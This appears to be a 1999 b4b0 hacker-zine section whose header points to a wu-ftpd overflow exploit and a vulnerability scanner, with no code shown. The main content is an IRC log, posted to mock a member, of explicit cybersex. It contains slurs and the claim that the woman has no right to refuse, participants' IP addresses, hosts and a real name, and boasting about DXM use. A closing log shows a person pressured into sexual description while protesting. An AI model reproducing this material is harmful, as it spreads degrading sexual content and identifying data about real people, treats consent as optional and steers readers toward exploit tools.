-------------------------------------------------------------------------------------------
<!b4b0!b4b0!b4b0!b4b0!> el8 wu-ftpd overflow, by cossack and smiler <!b4b0!b4b0!b4b0!b4b0!>
-------------------------------------------------------------------------------------------
Check out /wu-ftpd/w00f.c
Also, check out /wu-ftpd/fscan.c for remote wu-ftpd buffer overflow scanner.
Scans for versions 12-18. Ph1x@b4b0.org.
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
[IRC LOGZ!@#$]
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
(kur4ck getting hiz sh33t on w1th muh w0men)
NOTE: He is actually whacking off during this session of cybersex on IRC.
IRC log started Tue Feb 23 15:18:14 1999
[asphxia(bg0124a@216.76.138.90)] 2640 country trace
[asphxia(bg0124a@216.76.138.90)] conyers ga
[asphxia(bg0124a@216.76.138.90)] 30013
[asphxia(bg0124a@216.76.138.90)] ok
[asphxia(bg0124a@216.76.138.90)] bree
[msg(asphixa)] HE hill mail u 5$s HEHim loaded
[rachel_(nobans@166-87-97.ipt.aol.com)] hahahaha
[msg(asphixia)] HE hill mail u 5$s HEHim loaded
<rachel_> ok
<rachel_> back
<rachel_> chrak
<rachel_> he loves the simpsons too
<rachel_> :\
[msg(asphxia)] im loaded HEH ill send u a 54 bill
[msg(rachel_)] HEH for 5$ she will cybersex me
[msg(rachel_)] im gonna log it
<rachel_> so youre more like him than u thought
<rachel_> :\
[msg(rachel_)] and
[msg(rachel_)] let gummo see it HEH!!
[rachel_(nobans@166-87-97.ipt.aol.com)] haha ummo wont believe u
[rachel_(nobans@166-87-97.ipt.aol.com)] er gummo
[msg(rachel_)] HEH
[msg(asphxia)] HEH ok today!?!?!!
[msg(asphxia)] HEH ??!?!!?
[msg(asphxia)] HEH u better not turn out to be a man HGHEH!
ùíù tip [tip@209.107.78.20] has joined #falon
<tip> yo yo yo yo
<chrak> yo
<tip> i'm gonna...
<tip> DANCE
ùíù tip [tip@209.107.78.20] has left #falon []
[msg(tip)] HEH im trying to get phone/cyber sex from phixes girlfriend HEH!!!
[asphxia(bg0124a@216.76.138.90)] i am not a man
[msg(tip)] she said if i mail her money she will so HEH.
[msg(asphxia)] HEH ok
[tip(tip@209.107.78.20)] HUH?
ð asphxia lays down naked on your bed
[msg(tip)] HEH shut up im getting laid
ùíù Starting conversation with asphxia
[tip(tip@209.107.78.20)] werd
[msg(asphxia)] heh ok
[msg(asphxia)] HEH hurry up im whacking off to pt0n HEH!!
ð asphxia starts to play with her clirt
[msg(asphxia)] pr0n!
[asphxia(bg0124a@216.76.138.90)] -r
[msg(asphxia)] HEH huh ?
[msg(asphxia)] well
[msg(asphxia)] lets hurry p im leavin in 40 minutes HEh and i wnna talk to someone on irc after u HEH!
[asphxia(bg0124a@216.76.138.90)] ok
[asphxia(bg0124a@216.76.138.90)] ok
ð asphxia starts to rub her clit harder
[msg(asphxia)] oHEH r u like fingering urself or some shit HEH ?
ð asphxia sucks on the head of your dick
ð asphxia puts her fingers in to her wet pussy
[msg(asphxia)] HEH ur not seriously doing that r u HEH ?
[msg(asphxia)] HEH ok
[msg(asphxia)] keep tyalking!! HEH
ð -> chrak/asphxia HEH me starts liek uNFIng u HH!
[msg(asphxia)] HEH!@!!
ÚÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄÄÄÄ--- -- -
| asphxia (bg0124a@216.76.138.90) (unknown)
³ ircname : bree
| channels : #atlantaga
³ server : irc.emory.edu ([170.140.4.6] Emory University)
[msg(asphxia)] HEH helloo HEH !!
[msg(asphxia)] u cant just start and stop HEH!!
[msg(asphxia)] it sux like that!!!
[ Channel ][ Nickname ][ user@host ][ level ]
[#falon ][@chrak ][sean@cpwright.com ] [n/a]
[#falon ][@Falon ][~Falon@x2-11.cosmoaccess.net ] [n/a]
[#falon ][@liquidhex][ketamine@nw50.netwave.ca ] [n/a]
[#falon ][@rachel_ ][nobans@166-87-97.ipt.aol.com ] [n/a]
[msg(rachel)] HEH omg
[msg(rachel_)] HEH omg
[msg(rachel_)] she stopped cybering me for no reason HEH!!
[msg(rachel_)] HEH
[msg(rachel_)] unless she is really doing the shit she is saying shes doing HEH!
ÚÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄÄÄÄ--- -- -
| chrak (sean@cpwright.com) (Internic Commercial)
³ ircname : Sean Harny
| channels : #b4b0 #dr00gz @#falon
³ server : irc.cs.cmu.edu (calloc(1,sizeof(geek)))
: idle : 0 hours 0 mins 39 secs (signon: Tue Feb 23 14:35:33 1999)
[ctcp(asphxia)] PING
ÚÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄÄÄÄ--- -- -
| asphxia (bg0124a@216.76.138.90) (unknown)
³ ircname : bree
| channels : #atlantaga
³ server : irc.emory.edu ([170.140.4.6] Emory University)
ùíù [#h] Bad channel key
ÚÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄÄÄÄ--- -- -
| asphxia (bg0124a@216.76.138.90) (unknown)
³ ircname : bree
| channels : #atlantaga
³ server : irc.emory.edu ([170.140.4.6] Emory University)
[ctcp(asphxia)] PING
<chrak> HEh her server is like dying or some shit HEH
[ctcp(asphxia)] PING
[ctcp(asphxia)] PING
[ctcp(#falon)] PING
ùíù Ignorance List:
[ 1] #b4b0: ALL
ùíù chrak [sean@cpwright.com] has joined #phrack
ùíù Topic for #phrack: shoe.
ùíù topic set by apropos [Tue Feb 23 01:04:13 1999]
ùíù [Users(#phrack:65)]
[ chrak ] [ fail ] [@hmf ] [ simpleton ] [ RedRasta ]
[@loadammo ] [ b0n3r ] [ gweeds ] [ fungus ] [ awr ]
[ [JFK] ] [ batz ] [ tyme ] [ ecx ] [ emoz ]
[ _jcd ] [@eb_ ] [@vis10n ] [ kaotik ] [ g00ey ]
[ F0uRier ] [ fiji ] [@angstrom ] [ Victoria ] [@sw1tchg0d ]
[ infecti0n ] [ spinux ] [ zach ] [@d-low ] [ cripto ]
[ interline ] [ dreck_ ] [@soyl3nt ] [@miph ] [@par ]
[@plaguez ] [@halflife ] [ yewdeepee ] [ shift4 ] [@ARP_H ]
[@b_ ] [ Kludge ] [@fah_ ] [@cain ] [ apathy ]
[@lanfear ] [ hi_ ] [ Neural_ ] [ thwack ] [ i87 ]
[@route ] [@apropos ] [@soylent ] [@bovine ] [@p-wInd0Wz ]
[@kamee ] [ neurostim ] [ krnl ] [ kweiheri ] [ meenk ]
[@ikol ] [@syke ] [ enr1que ] [@nihilis ] [ theclerk ]
ùíù [Users(#phrack:13)]
[@sirsyko ] [ falken ] [@rogerb ] [ snowman ] [ fx ]
[@felix ] [ nocarrier ] [ chris ] [@FrontLine ] [ gaius_ ]
[@kiad ] [@tmcm ] [@silitek ]
ùíù Channel #phrack was created at Sat Jul 18 08:25:57 1998
ùíù BitchX: Join to #phrack was synced in 0.292 secs!!
ùíù chrak [sean@cpwright.com] has left #phrack []
ùíù chrak [sean@cpwright.com] has joined #chat
ùíù Topic for #chat: le porc frangais indique que vous joindrez mes ligions
ùíù topic set by Chewbacca [Tue Feb 23 15:19:08 1999]
ùíù [Users(#chat:28)]
[ chrak ] [ zahr ] [ skibum1 ] [ RuFfrYdEr ] [ Luvman ]
[ billisray ] [ iibmoz ] [ FireLord ] [ uberpig ] [@PartyDr ]
[@ssmile ] [ Poisoned ] [ kasper ] [ Cochise ] [@Wildcard ]
[ Sigma2000 ] [@Gobo ] [@Porthos ] [ Zooj ] [@Fedaykin ]
[@Chewbacca ] [ `cat ] [ Hrunting ] [@shinsei ] [@Babylon ]
[@Athos ] [@Aramis ] [@Lao-Tzu ]
ùíù Channel #chat was created at Wed Feb 3 12:44:48 1999
ùíù BitchX: Join to #chat was synced in 0.176 secs!!
[msg(asphxia)] HEH
ùíù chrak [sean@cpwright.com] has left #chat []
ùíù Ignorance List:
[ 1] #b4b0: ALL
ùíù Connecting to port 6667 of server irc.prison.net [refnum 12]
!irc.prison.net Looking up your hostname...
!irc.prison.net Checking Ident
!irc.prison.net Got Ident response
!irc.prison.net Found your hostname
ùíù Your nick [chrak] is owned by sean@cpwright.com
ùíù BitchX: For more information about BitchX type /about
ùíù Welcome to the Internet Relay Network chrak_
ùíù Your host is irc.Prison.NET[irc], running version 2.8.21+RF+CSr30
ùíù This server was created Mon Nov 23 1998 at 10 29:13 PST
ùíù irc.Prison.NET 2.8.21+RF+CSr30 oiwsfcukbdl biklmnopstv
ùíù [local users on irc(796)] 2%
ùíù [global users on irc(5575)] 12%
ùíù [invisible users on irc(40720)] 88%
ùíù [ircops on irc(187)] 0%
ùíù [total users on irc(46295)]
ùíù [unknown connections(0)]
ùíù [total servers on irc(45)] (avg. 1028 users per server)
ùíù [total channels created(19156)] (avg. 2 users per channel)
ùíù [Highest client connection count(1452) (1451)]
ùíù Mode change [+iw] for user chrak_
ùíù Topic for #b4b0: r4lph has quit b4b0. I've massd'd the place to commemorate his fine service.
ùíù topic set by Stoner [Mon Feb 22 17:49:36 1999]
ùíù [Users(#b4b0:23)]
[ chrak_ ] [ raychel- ] [ Oroku ] [ MostHateD ] [ rachel_ ]
[ chrak ] [ Deads0u| ] [ m0f0 ] [ F0uRier ] [ ne0h ]
[ pahrohfit ] [ e- ] [ espionage ] [vz0rt ] [ zayten ]
[ bluetip ] [vb4b0 ] [ gb ] [ malloc- ] [ liquidhex ]
[ sadjester ] [ gob ] [ tip ]
ùíù chrak_ [~hmm@cpwright.com] has joined #dr00gz
ùíù [Users(#dr00gz:5)]
[ chrak_ ] [ chrak ] [@PHiNG ] [ liquidhex ] [@irrupt ]
ùíù chrak_ [~hmm@cpwright.com] has joined #falon
ùíù [Users(#falon:6)]
[ chrak_ ] [ raychel- ] [@rachel_ ] [@chrak ] [@Falon ]
[@liquidhex ]
ùíù Channel #b4b0 was created at Mon Jan 25 17:26:24 1999
ùíù BitchX: Join to #b4b0 was synced in 9.500 secs!!
ùíù Channel #dr00gz was created at Sun Feb 21 19:35:58 1999
ùíù BitchX: Join to #dr00gz was synced in 15.124 secs!!
ùíù Channel #falon was created at Tue Feb 23 07:24:25 1999
[ Channel ][ Nickname ][ user@host ][ level ]
[#falon ][@chrak ][sean@cpwright.com ] [n/a]
[#falon ][ chrak_ ][~hmm@cpwright.com ] [n/a]
[#falon ][@Falon ][~Falon@x2-11.cosmoaccess.net ] [n/a]
[#falon ][@rachel_ ][nobans@166-87-97.ipt.aol.com ] [n/a]
[#falon ][ raychel- ][nobans@171-170-154.ipt.aol.com ] [n/a]
ùíù BitchX: Join to #falon was synced in 21.486 secs!!
[msg(asphxia)] HEH ok
<raychel-> chrak it happened to me too :\
ÚÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄÄÄÄ--- -- -
| asphxia (bg0124a@216.76.138.90) (unknown)
³ ircname : bree
| channels : #atlantaga
³ server : irc.emory.edu ([170.140.4.6] Emory University)
<irrupt:#dr00gz> hey do0d
ùíù SignOff rachel_: #falon (Ping timeout: 240 seconds)
[msg(asphxia)] msg me plz HEH
[ Channel ][ Nickname ][ user@host ][ level ]
[#falon ][@chrak ][sean@cpwright.com ] [n/a]
[#falon ][ chrak_ ][~hmm@cpwright.com ] [n/a]
[#falon ][@Falon ][~Falon@x2-11.cosmoaccess.net ] [n/a]
[#falon ][@liquidhex][ketamine@nw50.netwave.ca ] [n/a]
[#falon ][ raychel- ][nobans@171-170-154.ipt.aol.com ] [n/a]
[msg(asphxia)] ok
[asphxia(bg0124a@216.76.138.90)] nm
[msg(asphxia)] hehe
[msg(asphxia)] heh
[asphxia(bg0124a@216.76.138.90)] deal is off
[msg(asphxia)] huh ??
[Falon(~Falon@x2-11.cosmoaccess.net)] hey
[msg(asphxia)] huh ?
[msg(asphxia)] HEH!!
[msg(asphxia)] why HEH ?
[msg(falon)] hi
ùíù Ending conversation with asphxia
<chrak_> OMG
<chrak_> she just said
<chrak_> 'deal is off'
<chrak_> fucking
[msg(asphxia)] HEH the server died HEH!!!!!
[ Channel ][ Nickname ][ user@host ][ level ]
[#falon ][@chrak ][sean@cpwright.com ] [n/a]
[#falon ][ chrak_ ][~hmm@cpwright.com ] [n/a]
[#falon ][@Falon ][~Falon@x2-11.cosmoaccess.net ] [n/a]
[#falon ][@liquidhex][ketamine@nw50.netwave.ca ] [n/a]
[#falon ][ raychel- ][nobans@171-170-154.ipt.aol.com ] [n/a]
<chrak_> fucki
<chrak_> ng
<raychel-> ahahaha
[msg(asphxia)] HEH damnbitch slut
ùíù You're not opped on #falon
<chrak_> EH
<chrak_> HEh
<chrak_> BAN asphxia
<chrak_> i dont need
[msg(asphixa)] HEH!!
asphixa: No such nick/channel
<chrak_> she said
[ Channel ][ Nickname ][ user@host ][ level ]
[#falon ][@chrak ][sean@cpwright.com ] [n/a]
[#falon ][ chrak_ ][~hmm@cpwright.com ] [n/a]
[#falon ][@Falon ][~Falon@x2-11.cosmoaccess.net ] [n/a]
[#falon ][@liquidhex][ketamine@nw50.netwave.ca ] [n/a]
[#falon ][ raychel- ][nobans@171-170-154.ipt.aol.com ] [n/a]
<chrak_> HEH
[msg(asphxia)] HEH
<chrak_> she said
<chrak_> she would cyber me and wastes like 20 mniutes of my tyime HEh
<chrak_> its not like its sex HEH!
<chrak_> where she haz a right to say no HEH.
<chrak_> if i agree that iz HEH
[asphxia(bg0124a@216.76.138.90)] hey
ð asphxia licks your inner thigh
[msg(asphxia)] HEH Werd up ?
<chrak_> HEh
<chrak_> ohh nm
<raychel-> hahah
<chrak_> she startsed agian
<chrak_> HEH
ùíù Starting conversation with asphxia
<raychel-> hehe ok
[msg(asphxia)] heh
ð -> chrak_/asphxia likes ur outer pussy lips HEH
[Falon(~Falon@x2-11.cosmoaccess.net)] hmm
[asphxia(bg0124a@216.76.138.90)] mmmmm
ð asphxia fingers her pussy
[Falon(~Falon@x2-11.cosmoaccess.net)] you are really strange
[asphxia(bg0124a@216.76.138.90)] mmmm
[msg(asphxia)] HEH r u really getting off HEH
[msg(asphxia)] HEH
<irrupt:#dr00gz> there
ð -> chrak_/asphxia resumes whacking off HEh continue talking plz HEH!
ùíù ph1x [sickmade@01-029.009.popsite.net] has joined #Dr00gz
<irrupt:#dr00gz> got rid of a few potential hazards fer ya too
<ph1x:#Dr00gz> HEH!
<irrupt:#dr00gz> rpc. daemons
<irrupt:#dr00gz> erm
<irrupt:#dr00gz> wrong damn channel
<raychel-> i must go
<ph1x:#Dr00gz> I've done like 8 math assignments today BABY
<ph1x:#Dr00gz> HEH!
[msg(raychel-)] HEH by
<raychel-> bye!
[raychel-(nobans@171-170-154.ipt.aol.com)] bye :D
[raychel-(nobans@171-170-154.ipt.aol.com)] ill bbi like 30
[msg(asphxia)] HEH
[raychel-(nobans@171-170-154.ipt.aol.com)] i just hafta make a call LD
[raychel-(nobans@171-170-154.ipt.aol.com)] er :D
[msg(raychel-)] HEH ok damn asphxia sux at this shes slooooow typer HEH
[msg(asphxia)] HEH r u just
[msg(asphxia)] doing this
[raychel-(nobans@171-170-154.ipt.aol.com)] hahha
[raychel-(nobans@171-170-154.ipt.aol.com)] ok
[msg(asphxia)] to piss me off HEHEH!!
[msg(asphxia)] like
[msg(asphxia)] HEH.
[raychel-(nobans@171-170-154.ipt.aol.com)] later
ùíù SignOff raychel-: #falon (Giving in won't stop the noise.)
[msg(asphxia)] start making me whack off
[msg(asphxia)] then
[msg(asphxia)] stop
[msg(asphxia)] talking HEH!
[msg(asphxia)] HEH me
[msg(asphxia)] begins
[msg(asphxia)] to
ð asphxia strokes her pussy with one hand and your phat cock
[asphxia(bg0124a@216.76.138.90)] with the other
ùíù mode/#falon [+o chrak_] by Falon
ð -> chrak_/asphxia moans HEH
ð asphxia wants you to put your hand in her pussy
[asphxia(bg0124a@216.76.138.90)] shit ph1x is on
ð -> chrak_/asphxia puts his hand ALL the way up there HEH!
ùíù ph1x [sickmade@01-029.009.popsite.net] has joined #falon
ð asphxia still wants you though
<ph1x> HEH!@#$
ð asphxia starts to get wet
[msg(asphxia)] HEH ok ignore him HEH!!
<ph1x> chrak
ùíù ph1x [sickmade@01-029.009.popsite.net] has left #falon []
[msg(ph1x)] wait like 5 minutes ok HEH ?
[ph1x(sickmade@01-029.009.popsite.net)] HEH
[ph1x(sickmade@01-029.009.popsite.net)] FOR WHAT?
[ph1x(sickmade@01-029.009.popsite.net)] HEH!
[ph1x(sickmade@01-029.009.popsite.net)] asphxia my women is on
[ph1x(sickmade@01-029.009.popsite.net)] HEH!
[msg(asphxia)] HEH jsut ms me shit HEH cause im whacking off
[ph1x(sickmade@01-029.009.popsite.net)] HEH!@#$
[ph1x(sickmade@01-029.009.popsite.net)] HEHAHHEHAH
[msg(asphxia)] HEH ph1x is here yes HEH hurry up HEH!
[msg(asphxia)] im looking at pr0n so it wont take long HEH if i hurry
ð asphxia licks the head of your dick
[asphxia(bg0124a@216.76.138.90)] mmmmmmm
[asphxia(bg0124a@216.76.138.90)] put it in me
ð -> chrak_/ashxia puts it in u
ashxia: No such nick/channel
ð -> chrak_/asphxia puts it in u
[asphxia(bg0124a@216.76.138.90)] mmm
ð asphxia squeals
[asphxia(bg0124a@216.76.138.90)] it feels sooo good
ð -> chrak_/asphxia IZ APPROCHING ORGASM FROM THIS STUPID EXCUSE FOR SEX HEH@!@A!@
ùíù NetSplit: irc-e.frontiernet.net split from irc.exodus.net [03:37pm]
ùíù BitchX: Press Ctrl-F to see who left Ctrl-E to change to [irc-e.frontiernet.net]
[asphxia(bg0124a@216.76.138.90)] mmmmmm
ð asphxia rides your big cock
[asphxia(bg0124a@216.76.138.90)] ohhh
[asphxia(bg0124a@216.76.138.90)] you feel how wet i am
[msg(asphxia)] HEH yep
ùíù SignOff ph1x: #dr00gz (Leaving)
[asphxia(bg0124a@216.76.138.90)] mmmmm]
ð asphxia purrs
[asphxia(bg0124a@216.76.138.90)] fuck me hard
[asphxia(bg0124a@216.76.138.90)] i want to feel you cum
[msg(asphxia)] heh i am HEH
[msg(asphxia)] im whacking off HEH!!!
[asphxia(bg0124a@216.76.138.90)] you are?
[msg(asphxia)] HEH YEP
[msg(asphxia)] well
[msg(asphxia)] ok
[msg(asphxia)] HEH
ð asphxia wants to feel you cum all inside her
[msg(asphxia)] im fucking u HEH!
[asphxia(bg0124a@216.76.138.90)] oooooh
[msg(asphxia)] EHEH ok her we go
[asphxia(bg0124a@216.76.138.90)] fuck me harder
ð asphxia squeals
ð asphxia turns over and inserts your cock into her tight ass
ùíù asphxia [bg0124a@216.76.138.90] has joined #dr00gz
[msg(asphxia)] hehe
[msg(asphxia)] ok im almost cumming HEH
<asphxia:#dr00gz> hiya
[msg(asphxia)] just type some more shit HEh
[msg(asphxia)] and say
[msg(asphxia)] 'ohh chrak HEH'
[msg(asphxia)] like moan it HEH!!!!
ùíù SignOff liquidhex: #dr00gz,#falon (Ping timeout)
[ Channel ][ Nickname ][ user@host ][ level ]
[#falon ][@chrak_ ][~hmm@cpwright.com ] [n/a]
[#falon ][@Falon ][~Falon@x2-11.cosmoaccess.net ] [n/a]
ùíù BitchX: Ambiguous command: F
[msg(asphxia)] f
ÚÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄÄÄÄ--- -- -
| asphxia (bg0124a@216.76.138.90) (unknown)
³ ircname : bree
| channels : #dr00gz
³ server : irc.emory.edu ([170.140.4.6] Emory University)
ùíù ph1x [sickmade@01-029.009.popsite.net] has joined #falon
[asphxia(bg0124a@216.76.138.90)] ohhh crack HEH
ùíù ph1x [sickmade@01-029.009.popsite.net] has joined #dr00gz
[asphxia(bg0124a@216.76.138.90)] fuck me harded
[msg(asphxia)] heh
[msg(asphxia)] ij
[asphxia(bg0124a@216.76.138.90)] your cock feels sooo good in my asss
[asphxia(bg0124a@216.76.138.90)] mmmm
<ph1x:#dr00gz> hmMmmmm
[msg(asphxia)] ur ass is about to get like
[msg(asphxia)] filled up with cum HEH@
[msg(asphxia)] !!
ð asphxia rubs her clit
[asphxia(bg0124a@216.76.138.90)] yum
ð asphxia cannot wait
[msg(asphxia)] HEH keep talikng im almost done HEH!!!
[msg(asphxia)] HEH keep talikng im almost done HEH!!!
[msg(asphxia)] HEH keep talikng im almost done HEH!!!
ð asphxia rides your phat cock
[asphxia(bg0124a@216.76.138.90)] mmmmm
[asphxia(bg0124a@216.76.138.90)] fuck me hard
ð asphxia puts a hand inside her hot pussy
[asphxia(bg0124a@216.76.138.90)] i want to feel you come
[msg(asphxia)] HEH
ð -> chrak_/asphxia pinching ur nipz HEH!@
[asphxia(bg0124a@216.76.138.90)] uuum
3:45pm up 4 days, 2:28, 3 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
descende ttyp3 ron-ny13-22.ix.n 3:28pm 9:27 0.16s 0.16s -bash
sean ttya1 dialup28:S.0 2:38pm 0.00s 8.86s 8.86s BitchX chrak
cpwright ttyp1 sls17.asb.com 3:28pm 1:09 0.38s 0.05s talk sean
[asphxia(bg0124a@216.76.138.90)] don't sto[
[asphxia(bg0124a@216.76.138.90)] p
[msg(asphxia)] heh
[msg(asphxia)] no u dont stop HEH im the on whacking off HEH!!
ð -> chrak_/asphxia places it in ur mouth HEH.
<ph1x:#dr00gz> anyone hERE?
ð -> chrak_/asphxia wants a BJ HEH!!! ball sucking to oHEH!!
<ph1x:#dr00gz> wakeup asphxia
[msg(ph1x)] hold on 5 minutes
<ph1x:#dr00gz> HEH!
[ph1x(sickmade@01-029.009.popsite.net)] HEH
ð asphxia rubs her tongue up and down your throbbing dick
[ph1x(sickmade@01-029.009.popsite.net)] are you whacking off?
[asphxia(bg0124a@216.76.138.90)] mmmm
<irrupt:#dr00gz> nope.. noone here
ùíù mode/#dr00gz [+o ph1x] by irrupt
ùíù mode/#dr00gz [+oo chrak_ asphxia] by ph1x
<ph1x:#dr00gz> chrak is whacking off
<ph1x:#dr00gz> HEH
[msg(asphxia)] heh
<irrupt:#dr00gz> haha
<ph1x:#dr00gz> he keeps msg'ng me to holdon 5 mins
<chrak_:#dr00gz> shut up i am not HEH!
[asphxia(bg0124a@216.76.138.90)] mmmm
ÚÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄÄÄÄ--- -- -
| asphxia (bg0124a@216.76.138.90) (unknown)
³ ircname : bree
| channels : @#dr00gz
³ server : irc.emory.edu ([170.140.4.6] Emory University)
ð asphxia sucks it hard
<ph1x:#dr00gz> um
[asphxia(bg0124a@216.76.138.90)] in
<ph1x:#dr00gz> HEH
[asphxia(bg0124a@216.76.138.90)] out
<ph1x:#dr00gz> yes you are
[asphxia(bg0124a@216.76.138.90)] in out
[msg(asphxia)] herhh
[msg(asphxia)] ok
<ph1x:#dr00gz> du0d
[msg(asphxia)] suck ma balsl HEH!
<ph1x:#dr00gz> yesterday was the worst trip i've ever had on dxm
<ph1x:#dr00gz> it sucked
<ph1x:#dr00gz> HEH!
<ph1x:#dr00gz> listen to this
<ph1x:#dr00gz> My mom was bitching me out
<ph1x:#dr00gz> calling me a robo junkie
<ph1x:#dr00gz> because I told her I drank a shitload of robotussn
<ph1x:#dr00gz> when infact I really took a bunch of pure dxm
<ph1x:#dr00gz> and I got really pissed off
<ph1x:#dr00gz> and punched a huge hole in the wall
<ph1x:#dr00gz> HEH!
<ph1x:#dr00gz> down by the stairs
<ph1x:#dr00gz> and I didnt even feel it
ð asphxia wraps her mouth around your balls and sucks on them
<ph1x:#dr00gz> because dxm makes your body like numb'
<ph1x:#dr00gz> HEH!
[msg(asphxia)] suck ma balsl HEH!
<ph1x:#dr00gz> I could have like karate chopped through metal
[msg(asphxia)] HEH ok
<asphxia:#dr00gz> ph1x
[msg(asphxia)] HEH ok im about to like jizz atnd shti HE Hkeep sucking !
<ph1x:#dr00gz> yes?
ð asphxia sucks them hard
ð asphxia wraps her hand around your cock
<asphxia:#dr00gz> hiya
<asphxia:#dr00gz> bebe
<ph1x:#dr00gz> I can't beleive I actually thought I could act normal in front of my parents on 800mg
<ph1x:#dr00gz> HEH!
[asphxia(bg0124a@216.76.138.90)] mmmmmmm
<ph1x:#dr00gz> HELLO BREE
<asphxia:#dr00gz> hi bebe
<asphxia:#dr00gz> kiss
[msg(asphxia)] ok
* >ph1x #dr00gz strips dravyn naked and gets out his whip and handcuffs
[msg(asphxia)] hurry im hgonna finnish in like 30 seconds HEH
<ph1x:#dr00gz> HEH
[msg(asphxia)] so keep typing HEH!
<ph1x:#dr00gz> you ready for an orgy of pain?
ð asphxia pulls on your phat cock
[asphxia(bg0124a@216.76.138.90)] mmmmm
[asphxia(bg0124a@216.76.138.90)] feels so good
[asphxia(bg0124a@216.76.138.90)] i want to feel you cum
[asphxia(bg0124a@216.76.138.90)] baby
[asphxia(bg0124a@216.76.138.90)] heh
<ph1x:#dr00gz> HEH!?
<asphxia:#dr00gz> yes
[msg(asphxia)] HEH ALMOST
<asphxia:#dr00gz> from you always
<ph1x:#dr00gz> Do you like bondage?
[msg(asphxia)] GWG me niot phix HEH!
[msg(asphxia)] its annoying to stop and start HEH!!
ð asphxia wants you to come baby
[asphxia(bg0124a@216.76.138.90)] mmmm
ùíù mode/#falon [+o ph1x] by Falon
[asphxia(bg0124a@216.76.138.90)] ohhhh
[asphxia(bg0124a@216.76.138.90)] want to fuck
[asphxia(bg0124a@216.76.138.90)] again
[msg(asphxia)] HEH Ok
ð asphxia puts your hot dick into her wet pussy
[asphxia(bg0124a@216.76.138.90)] fuck me
[msg(asphxia)] type fast HEH for like one minute HEH and then il lbe done HEH
ð -> chrak_/asphxia starts pushing it in and out
<asphxia:#dr00gz> yeah
[msg(asphxia)] HEH ur nort getting off to this too r u HEH .
[msg(asphxia)] this works great with pr0n in front of u too HEH!
ð asphxia fucks you hard
ð -> chrak_/asphxia starts pushing it in and out
ð -> chrak_/asphxia HE Halmost done hurry up and fuck HEH!!
ð asphxia sucks onyour nipples
[asphxia(bg0124a@216.76.138.90)] mmmmm
ð asphxia 's muscles tighten
[asphxia(bg0124a@216.76.138.90)] i am gonna cum
[asphxia(bg0124a@216.76.138.90)] babe
[msg(asphxia)] HEH good
ð -> chrak_/asphxia me feels her puss contracting on his cock
[msg(asphxia)] HEH type
[msg(asphxia)] im looking at this like life size pic
[msg(asphxia)] of
[asphxia(bg0124a@216.76.138.90)] mmmmmmmmmm
[msg(asphxia)] a woman cumming HEH!
<ph1x:#dr00gz> DMANIT
<ph1x:#dr00gz> HEH
ð asphxia hope syou cummmmm
<ph1x:#dr00gz> join #hackerz asphxia
<ph1x:#dr00gz> HEH!@#$
[asphxia(bg0124a@216.76.138.90)] i am about to
ð asphxia rams your cock into her wetpussy
[asphxia(bg0124a@216.76.138.90)] oh baby
ð -> chrak_/asphxia begins the final uhm HEH decent into pussy fuck land HEH!
[asphxia(bg0124a@216.76.138.90)] harder4
[asphxia(bg0124a@216.76.138.90)] it feels too good
ð asphxia moans
[msg(asphxia)] HEH discribe ur pussy HEH!
[msg(asphxia)] HEH almsot done HEH!
[asphxia(bg0124a@216.76.138.90)] it is wet
[asphxia(bg0124a@216.76.138.90)] and really deep
[asphxia(bg0124a@216.76.138.90)] and filled up with your hot cock
[asphxia(bg0124a@216.76.138.90)] mmm
[msg(asphxia)] HEH ok
[msg(asphxia)] im all done HEH!
[asphxia(bg0124a@216.76.138.90)] oh
[asphxia(bg0124a@216.76.138.90)] yes
[asphxia(bg0124a@216.76.138.90)] harder
[msg(asphxia)] HEH almsot done HEH!
[msg(asphxia)] HEH
[msg(asphxia)] all doe HEH
[msg(asphxia)] u can help clean up my damn hand and pantz tho HEH!
[asphxia(bg0124a@216.76.138.90)] mmmmmmmmmmmmm
[msg(asphxia)] HEH
[msg(asphxia)] ok
[msg(asphxia)] danke HEH.
[ Channel ][ Nickname ][ user@host ][ level ]
[#falon ][@chrak_ ][~hmm@cpwright.com ] [n/a]
[#falon ][@Falon ][~Falon@x2-11.cosmoaccess.net ] [n/a]
[#falon ][@ph1x ][sickmade@01-029.009.popsite.net ] [n/a]
[msg(ph1x)] HEH hi
[ph1x(sickmade@01-029.009.popsite.net)] hi
[msg(ph1x)] HEH r u talking to asphxia ?
...........................LOG ON
[ph1x(sickmade@01-029.009.popsite.net)] YeZ
ùíù intruderx [haxor@al8-p56-zg.tel.hr] has joined #dr00gz
[msg(ph1x)] ohh.
ùíù mode/#dr00gz [+o intruderx] by ph1x
[msg(ph1x)] HHE abpit what ?
<ph1x:#dr00gz> OK
<ph1x:#dr00gz> hi
IRC log ended Tue Feb 23 16:01:19 1999
-------------------------------------------------------------------------------
HEH zero d4y. no d1str0.
<sek> i could describe how i usually give head, if and when i do
<comp4ct> do it then.
<comp4ct> just using /me
<comp4ct> g0d im going to be here all night.
<sek> if that would work
<comp4ct> well?
<sek> haha
<sek> if you keep complaining, you can just /part you know..
<comp4ct> no
<comp4ct> we have an agreement.
<sek> you are getting lag bursts again
<sek> and why do i have to use /me ?
<comp4ct> because
<comp4ct> well you don't
<comp4ct> /me just makes it all better i guess.
<sek> what if i don't want to use /me?
<sek> hm
<comp4ct> then don't
<comp4ct> just get to the cybering
<sek> this is weird :\
<sek> i'll just describe how i gave my ex head, i guess
<comp4ct> k.
<sek> i used to kinda suprise him, and when he was sitting in his chair talking on IRC, I would unzip his pants and kinda kneel between his legs
<sek> I DON'T WANNA DO THIS
